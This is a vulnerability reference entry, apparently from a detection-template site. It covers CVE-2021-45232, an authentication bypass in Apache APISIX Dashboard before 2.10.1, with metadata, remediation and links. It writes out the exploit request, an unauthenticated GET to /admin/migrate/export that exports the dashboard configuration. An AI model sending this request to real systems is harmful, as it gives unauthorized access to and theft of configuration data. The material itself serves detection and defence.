🔙 목록으로 돌아가기

CVE-2021-45232: Apache APISIX Dashboard <2.10.1 - API Unauthorized Access

TitleApache APISIX Dashboard <2.10.1 - API Unauthorized Access
AuthorMr-xn
SeverityCritical
ImpactAn attacker can gain unauthorized access to the API, potentially leading to data breaches or unauthorized actions.
RemediationUpgrade to release 2.10.1 or later. Or, change the default username and password, and restrict the source IP to access the Apache APISIX Dashboard.
CVSS Score9.8
EPSS Score0.93877
CVE IDCVE-2021-45232
CWE IDCWE-306
Tags cve2021 cve apache unauth apisix vuln

🔍 Vulnerability Description

In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework droplet on the basis of framework gin.' While all APIs and authentication middleware are developed based on framework droplet, some API directly use the interface of framework gin` thus bypassing their authentication.

🌐 HTTP Request

GET /admin/migrate/export HTTP/1.1
Host: apisix
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-45232.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-45232.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A